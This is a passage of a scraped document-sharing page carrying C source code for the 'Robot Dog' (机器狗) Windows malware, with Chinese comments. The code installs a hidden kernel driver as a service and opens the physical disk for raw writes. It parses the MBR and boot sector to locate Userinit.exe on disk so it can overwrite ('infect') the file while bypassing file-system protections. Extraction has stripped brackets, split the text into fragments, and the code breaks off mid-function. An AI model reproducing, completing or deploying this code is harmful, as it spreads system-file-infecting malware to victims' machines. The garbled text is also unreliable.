1、机器狗源码机器狗源码(C语言的)/ Test.cpp : 定义控制台应用程序的入口点。/#include stdafx.h/=#include typedef struct _PARTITION_ENTRY UCHAR active; / 能否启动标志 UCHAR StartHead; / 该分区起始磁头号 UCHAR StartSector; / 起始柱面号高2位:6位起始扇区号 UCHAR StartCylinder; / 起始柱面号低8位 UCHAR PartitionType; / 分区类型 UCHAR EndHead; / 该分区终止磁头号 UCHAR EndSector; / 终止
2、柱面号高2位:6位终止扇区号 UCHAR EndCylinder; / 终止柱面号低8位 ULONG StartLBA; / 起始扇区号 ULONG TotalSector; / 分区尺寸(总扇区数) PARTITION_ENTRY, *PPARTITION_ENTRY;/=typedef struct _MBR_SECTOR UCHAR BootCode446; PARTITION_ENTRY Partition4; USHORT Signature; MBR_SECTOR, *PMBR_SECTOR;/=typedef struct _BBR_SECTOR USHORT JmpCode;
3、/ 2字节跳转指令,跳转到引导代码 UCHAR NopCode; / 1字节nop指令,填充用,保证跳转指令长3个字节 UCHAR OEMName8; / 8字节的OEMName / 下面开始为: BPB( BIOS Parameter Block ) USHORT BytesPerSector; / 每个扇区的字节数 (512 1024 2048 4096) UCHAR SectorsPerCluster; / 每个簇的扇区数 ( 1 2 4 8 16 32 64 128 )两者相乘不能超过32K(簇最大大小) USHORT ReservedSectors; / 从卷的第一个扇区开始的保留扇
4、区数目,该值不能为0,对于FAT12/FAT16,该值通常为1,对于FAT32,典型值为32 UCHAR NumberOfFATs; / 卷上FAT数据结构的数目,该值通常应为2,NTFS不使用NumberOfFATs字段,必须为0 USHORT RootEntries; / 对于FAT12/FAT16,该值表示32字节目录项的数目,对于FAT32,该值必须为0;NTFS不使用 USHORT NumberOfSectors16; / 该卷上的扇区总数,该字段可以为0,如果该字段为0,则NumberOfSectors32不能为0;对于FAT32,该字段必须为0 FAT32/NTFS不使用该字段
5、UCHAR MediaDescriptor; / 介质类型 USHORT SectorsPerFAT16; / 该字段标识一个FAT结构占有的扇区数(FAT12/FAT16),对于FAT32卷,该字段必须为0;FAT32/NTFS不使用该字段 USHORT SectorsPerTrack; / 用于INT 0x13中断的每个磁道的扇区数 USHORT HeadsPerCylinder; / 用于INT 0x13中断的每个柱面的磁头数 ULONG HiddenSectors; / 包含该FAT卷的分区之前的隐藏扇区数 ULONG NumberOfSectors32; / 该字段包含该卷上的所有扇
6、区数目,对于FAT32,该字段不为0;FAT12/FAT16可根据实际大小是否超过65536个扇区数决定是否采用该字段; NTFS不使用该字段 / 下面开始为: EBPB ( Extended BIOS Parameter Block ) ULONG SectorsPerFAT32; / 对于FAT32,该字段包含一个FAT的大小,而SectorsPerFAT16字段必须为0; BBR_SECTOR, *PBBR_SECTOR;#include #define PARTITION_TYPE_NTFS 0x07#define PARTITION_TYPE_FAT32 0x0B#define PA
7、RTITION_TYPE_FAT32_LBA 0x0C/=#define STR_SYSFILE_PATH TEXT(%SystemRoot%system32driverspcihdd.sys)#define STR_VIRFILE_PATH TEXT(%SystemRoot%System32Userinit.exe)#define STR_DSKDEVICE_NAME TEXT(.PhysicalDrive0)#define STR_HDDDEVICE_NAME TEXT(.PhysicalHardDisk0)/=#define IOCTL_MYDEV_BASE 0xF000#define
8、IOCTL_MYDEV_Fun_0xF01 CTL_CODE(IOCTL_MYDEV_BASE, 0xF01, METHOD_BUFFERED, FILE_ANY_ACCESS)/=DWORD InstallAndStartDriver(HMODULE ModuleHandle) TCHAR filePathMAX_PATH; HANDLE fileHandle; HRSRC hSysRes; DWORD dwWritten; DWORD dwSysLen; PVOID lpSysBuf; SC_HANDLE hSCManager; SC_HANDLE hService; SERVICE_ST
9、ATUS sService; DWORD errCode = ERROR_SUCCESS; if( (NULL = (hSysRes = FindResource(ModuleHandle, (LPCTSTR)1001, (LPCTSTR)1001) | (0 = (dwSysLen = SizeofResource(ModuleHandle, hSysRes) | (NULL = (lpSysBuf = LockResource(hSysRes) | (0 = ExpandEnvironmentStrings(STR_SYSFILE_PATH, &filePath0, sizeof(file
10、Path) | (INVALID_HANDLE_VALUE = (fileHandle = CreateFile(filePath, GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL) ) errCode = GetLastError(); goto FunExit00; if( !WriteFile(fileHandle, lpSysBuf, dwSysLen, &dwWritten, NULL) | !SetEndOfFile(fileHandle) | !FlushFileBuffers(fileHandle
11、) ) errCode = GetLastError(); CloseHandle(fileHandle); if(ERROR_SUCCESS != errCode) goto FunExit01; if(NULL = (hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS) errCode = GetLastError(); goto FunExit01; hService = CreateService( hSCManager, TEXT(PciHdd), TEXT(PciHdd), SERVICE_ALL_ACCESS,
12、 SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE, filePath, NULL, NULL, NULL, NULL, NULL ); if(NULL != hService) CloseServiceHandle(hService); else if(NULL != (hService = OpenService(hSCManager, TEXT(PciHdd), SERVICE_ALL_ACCESS) ControlService(hService, SERVICE_CONTROL_STOP, &sServ
13、ice); DeleteService(hService); CloseServiceHandle(hService); hService = CreateService( hSCManager, TEXT(PciHdd), TEXT(PciHdd), SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE, filePath, NULL, NULL, NULL, NULL, NULL ); if(NULL != hService) CloseServiceHandle(hSer
14、vice); else errCode = GetLastError(); goto FunExit02; if(NULL = (hService = OpenService(hSCManager, TEXT(PciHdd), SERVICE_START) errCode = GetLastError(); goto FunExit02; StartService(hService, 0, NULL); CloseServiceHandle(hService);FunExit02: CloseServiceHandle(hSCManager);FunExit01: DeleteFile(fil
15、ePath);FunExit00: return errCode;/=DWORD StopAndDeleteDriver(VOID) TCHAR filePathMAX_PATH; SC_HANDLE hSCManager; SC_HANDLE hService; SERVICE_STATUS sService; DWORD errCode = ERROR_SUCCESS; if(NULL = (hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS) errCode = GetLastError(); goto FunExit
16、00; if(NULL = (hService = OpenService(hSCManager, TEXT(PciHdd), SERVICE_ALL_ACCESS) errCode = GetLastError(); goto FunExit01; ControlService(hService, SERVICE_CONTROL_STOP, &sService); DeleteService(hService); CloseServiceHandle(hService);FunExit01: CloseServiceHandle(hSCManager);FunExit00: ExpandEn
17、vironmentStrings(STR_SYSFILE_PATH, &filePath0, sizeof(filePath); DeleteFile(filePath); return errCode;/=/ 感染硬盘第一个分区的指定的文件/ / 1)通过FSCTL_GET_RETRIEVAL_POINTERS获取文件数据的分布 信息/ / 2)通过直接访问硬盘(.PhysicalHardDisk0)的的MDR和第一个分区的引导扇区得到分区参数来定位文件。/ / 3)通过对比ReadFile读取的文件数据和自己定位后直接 读取所得到的文件数据,确定定位是否正确/ / 入口参数:/ 要感染的文
18、件名(完整路径)/ / Return value:/ Success - NULL/ Failed - 指向出错信息的指针/=DWORD WriteVirusToDisk(LPCTSTR VirusFile) STARTING_VCN_INPUT_BUFFER iVcnBuf; UCHAR oVcnBuf272; PRETRIEVAL_POINTERS_BUFFER lpVcnBuf; DWORD dwVcnExtents; LARGE_INTEGER startLcn; PUCHAR lpClusterBuf; DWORD dwClusterLen; UCHAR dataBuf512; UC
19、HAR diskBuf512; DWORD dataLen; LARGE_INTEGER diskPos; PPARTITION_ENTRY lpPartition; ULONG dwPartitionStart; ULONG dwPartitionType; PBBR_SECTOR lpBootSector; DWORD SectorsPerCluster; HANDLE hHddDevice; HANDLE hDskDevice; HANDLE hVirusFile; DWORD errCode = ERROR_SUCCESS; if(INVALID_HANDLE_VALUE = (hHd
20、dDevice = CreateFileA(STR_HDDDEVICE_NAME, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL) errCode = GetLastError(); goto FunExit00; / if(INVALID_HANDLE_VALUE = (hVirusFile = CreateFileA(VirusFile, GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_NO_BUFFERING, NULL) errCo
21、de = GetLastError(); goto FunExit01; iVcnBuf.StartingVcn.QuadPart = 0; RtlZeroMemory(oVcnBuf, sizeof(oVcnBuf); if(!DeviceIoControl(hVirusFile, FSCTL_GET_RETRIEVAL_POINTERS, &iVcnBuf, sizeof(iVcnBuf), &oVcnBuf0, sizeof(oVcnBuf), &dataLen, NULL) errCode = GetLastError(); goto FunExit02; lpVcnBuf = (PR
22、ETRIEVAL_POINTERS_BUFFER)&oVcnBuf0; dwVcnExtents = lpVcnBuf-ExtentCount; startLcn = lpVcnBuf-Extents0.Lcn; if(!dwVcnExtents) errCode = (ULONG)(-3); / 文件太小, 不能操作 goto FunExit02; if(startLcn.QuadPart = -1) errCode = (ULONG)(-4); / 该文件是压缩文件, 不能操作 goto FunExit02; ReadFile(hVirusFile, dataBuf, sizeof(dat
23、aBuf), &dataLen, NULL); / 打开第一个物理硬盘 if(INVALID_HANDLE_VALUE = (hDskDevice = CreateFileA(STR_DSKDEVICE_NAME, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL) errCode = GetLastError(); goto FunExit02; / 读取硬盘第一个扇区(MBR) SetFilePointer(hDskDevice, 0, NULL, FILE_
24、BEGIN); ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL); lpPartition = &(PMBR_SECTOR)&diskBuf0)-Partition0); if(lpPartition0.active != 0x80) errCode = (ULONG)(-1); / 分区不是启动分区 goto FunExit03; dwPartitionType = lpPartition0.PartitionType; if( dwPartitionType != PARTITION_TYPE_FAT32 & dw
25、PartitionType != PARTITION_TYPE_FAT32_LBA & dwPartitionType != PARTITION_TYPE_NTFS ) errCode = (ULONG)(-2); / 不支持的磁盘分区 goto FunExit03; dwPartitionStart = lpPartition0.StartLBA; diskPos.QuadPart = dwPartitionStart * 512; / 读取启动分区的第一个扇区(启动扇区) SetFilePointer(hDskDevice, diskPos.LowPart, &diskPos.HighPa
26、rt, FILE_BEGIN); ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL); lpBootSector = (PBBR_SECTOR)&diskBuf0; SectorsPerCluster = lpBootSector-SectorsPerCluster; / 根据FAT32/NTFS计算Userinit的起始簇的偏移量 diskPos.QuadPart = dwPartitionStart; diskPos.QuadPart+= lpBootSector-ReservedSectors; if(dwPart
27、itionType = PARTITION_TYPE_FAT32 | dwPartitionType = PARTITION_TYPE_FAT32_LBA) diskPos.QuadPart+= lpBootSector-NumberOfFATs * lpBootSector-SectorsPerFAT32; diskPos.QuadPart+= startLcn.QuadPart * SectorsPerCluster; diskPos.QuadPart*= 512; / 检查文件寻址 SetFilePointer(hDskDevice, diskPos.LowPart, &diskPos.HighPart, FILE_BEGIN); ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL); if(!RtlEqualMemory(dataBuf, diskBuf, sizeof(diskBuf) errCode = (ULONG)(-5); / 寻址文件不成功 goto FunExit03; / 分配缓冲 dwClust
copyright@ 2008-2022 冰豆网网站版权所有
经营许可证编号:鄂ICP备2022015515号-1
升级会员 